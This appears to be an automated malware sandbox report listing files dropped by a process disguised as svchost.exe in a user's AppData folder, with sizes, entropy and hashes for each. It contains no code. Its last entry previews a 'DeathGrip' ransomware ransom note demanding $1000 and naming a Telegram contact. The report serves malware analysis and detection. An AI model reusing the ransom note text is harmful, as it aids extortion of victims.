                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.824738308445327
                                                          Encrypted:false
                                                          SSDEEP:48:1KLQARVhKyHoOEuzKfNz6EKSqrIcvajtE4EH1:gL5rxaz6EYrI0ajFM1
                                                          MD5:D868C11506EC3AF0D082F3EEE453D351
                                                          SHA1:9D8A7C38175981A7936D821FC537BEA4D351E651
                                                          SHA-256:509F183109D7E268443B6993776D2DB1E7DF210785C7E99014E03FB10D9AEA3E
                                                          SHA-512:66663F661E705F875634FD80CBB166C6153B4C4E5705E0FBBB21BFE45FEB054C68D81EB1AE03965AEE69C1D1738BD5B6DEC74506A0551ECD779D29A4190E3FA7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):262144
                                                          Entropy (8bit):7.916372329904234
                                                          Encrypted:false
                                                          SSDEEP:6144:lnDke9gyVWRlJrrOtgR15uIsls0tCKxa1D70+VAJRP/kDTdkjtu:lnDn012678n1w0ap7LAJRP/Um
                                                          MD5:4CFB3797AAEFAD61ABE1A1A9E6DE06AD
                                                          SHA1:4216601F0D1C15D4466EAA94E08C3B561EA3AA11
                                                          SHA-256:56C6F827FA1BC63AD5F1821B9FF6EC052AA0797A29246E7018A57C03E378C6B7
                                                          SHA-512:1039831FA9E6FB6839E77292EA192E7F6979D63AB0AA0F8617AF59877D5EF8C9C738562AE2C8D9960E47AA7DB24A788CA6BF1E8F6AF24E99AAD38F8E7177CDBC
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131072
                                                          Entropy (8bit):6.650154262776427
                                                          Encrypted:false
                                                          SSDEEP:3072:Lc7PUg9Mt/LlhgxzmOO24XO4vBcEddt2u:LeUg9+D/IzmOO24pBFdt2u
                                                          MD5:30407389C2F3DC0187B317F18D6990CD
                                                          SHA1:30AC2EB7189DC0577F1FD856E85D345F61CCBF80
                                                          SHA-256:E834A506181A96B768F1519AFD2778A5F2241516912F78EEE92DBDE2B06BEF0B
                                                          SHA-512:14E3340F229478565D1BF57995D25F79D717DB3FE2B42F818311318FE52E8B7D156469D3C059C74885B4789820B2CD7BFC8FB1F5C6F48A577DF8E2A936E4BF78
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):4.50404454616003
                                                          Encrypted:false
                                                          SSDEEP:768:AIK6NHZabU+SQTIgDTx6coSwL9rKOhA34t6YYAJ+KPJluZ+:AqtZ/yIgBVUKX34tszK
                                                          MD5:FB9634DFFDC79FD092A351149F200563
                                                          SHA1:1FA3B65319FD548590FB1461B857AA7242C2C24D
                                                          SHA-256:18B4F965544E264488A5060F8F43A9C0D44797B7FECF73CD3EBED399FA479390
                                                          SHA-512:208D92AF8E1042381531CA58411D7D30F93A31E08C6FA35B6D0FC644D2CDC1C09AAFA8857AAAF494187321D4CB4414B95D0F4A2F8FFEE56CF3F67198EA6C4529
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131072
                                                          Entropy (8bit):6.629861518290798
                                                          Encrypted:false
                                                          SSDEEP:1536:lIkmx+V/jCeZ5eChU4waQBrxRpYzMjY+fqH30zJsI9pEgp1YlixmMnujaQyloqIA:ikmcRCe5eCK4wlrxRazpVEzBpfwHaHr
                                                          MD5:60B6DD348CA3BF413A46AF370085D8D1
                                                          SHA1:19F62DA46C785B770DA0A8D1E8EFFA33F38689D7
                                                          SHA-256:A86A87E6177B1A81D0C742ED2D82DCA77A0E765CE7B2434297A8DAFCBFFEC879
                                                          SHA-512:C1E65368C81726A880A93365C86F34944278C8539FDE5C9FB08EC85E2093387CDEC019646FB591FCF23200B27987579278AD82D6AEF08A0156A9BE4742527FF8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.3179750374383061
                                                          Encrypted:false
                                                          SSDEEP:192:eHzvHWykROwMLlZh65Z+aQ42uEN6URtN7t:iyykROvLDh65croE1
                                                          MD5:AE810D15E327063642A1ABE9C5044122
                                                          SHA1:797B99792D4D7DA0FA55A1F4F696D805481A3C1C
                                                          SHA-256:0E045E9A295C534D77338726A3556B1A853E25C7C233B26BD2C5DCC82989B9B1
                                                          SHA-512:7E372027E613B892B70578949776152B59DF1D41BFCDFFBC00E7575C3AED01E75B9A3958826B8475C14C0417374E91BBDC9456131E5616D49BA2C15A7DA75BA1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.732231659117873
                                                          Encrypted:false
                                                          SSDEEP:384:s0d42IMv0oJQhfU6/zgWSxCwNaweYM63JYPv+4pVTSz:hqesoWlUqBSxBEwU6K+4pNq
                                                          MD5:574613ADA80D35DA674D7776C92A4BC4
                                                          SHA1:E1339847BF24596F80C3724365D3E6D6E4145C09
                                                          SHA-256:0B3E6CCA2C0BF010F30D656A4280F1BDD6DF6D8CF59C8E0E2BEF8C616832E913
                                                          SHA-512:FF3046DDF85D84AF416F2C1DC9EA4A5B905C10546E53BCFA0A2E93034B45E4937D083109C67873A1CA8CC60A1883B27D73A557E7DC02C3DCABD6040B89BEE0FF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.7692687228622284
                                                          Encrypted:false
                                                          SSDEEP:192:41BMAk9zTz3TVYWCsTR0XtwW1D/q1v212otGOOeV5LeBHn87iDpPB:41+tjRS0SXtw6jqQEoqQC
                                                          MD5:C10BE8DDF86DCF491BC319B6F1C302AA
                                                          SHA1:7B6D669D5F26F0B3513E62F5EA78BB4BB44299E8
                                                          SHA-256:395DFB42155EF934FF4BB004A1F6CB6340C81BA66264EEB174C06E84B19CF222
                                                          SHA-512:1197AD75E5DB49DF258FB0E4F03EB586021437DC4D65F477DED23EFE3C8A17CB013E632D8510B5B9A047FB72FDBE0056A0FE1FCBD8741426905B7AB4F3E6A96E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
